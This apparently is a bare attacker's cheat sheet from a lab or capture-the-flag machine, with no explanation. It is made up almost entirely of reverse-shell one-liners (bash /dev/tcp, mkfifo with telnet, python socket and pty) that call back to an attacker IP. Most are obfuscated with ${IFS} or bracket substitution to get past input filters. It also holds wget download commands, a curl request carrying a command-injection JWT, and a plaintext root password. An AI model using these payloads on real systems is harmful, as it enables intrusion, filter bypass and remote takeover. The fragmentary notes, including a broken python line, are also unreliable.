sh${IFS}-i${IFS}>&${IFS}/dev/tcp/10.10.15.211/1234${IFS}0>&1
bash${IFS}-c${IFS}'bash${IFS}&>/dev/tcp/10.10.15.211/1234${IFS}<&1'
```sh
rm${IFS}f;mkfifo${IFS}f;cat${IFS}f|/bin/sh${IFS}-i${IFS}2>&1|telnet${IFS}10.10.15.211${IFS}1234${IFS}>${IFS}f
python3]-c]‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.15.211”,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
wget]10.10.15.211:3000/lol]-P]/tmp
```bash
IFS=];b=wget]http://10.10.15.211:80/test.txt]-P]/tmp;$b
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.15.149",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'
curl -i -s -k -X $'GET' \
-H $'Host: 172.16.1.22:3000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjbWQiOiJscyR7SUZTfS9ob21lL2pvZS8ubG9jYWwvc2hhcmUifQ.D2uZnNAqL1pkDpbS08v8YXemaQ9GFjqGExvyJBK7hYg' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'http://172.16.1.22:3000/'runn the jwt forward shell script /dev/null -c bash
su root HWaKJkUFgRe56WzG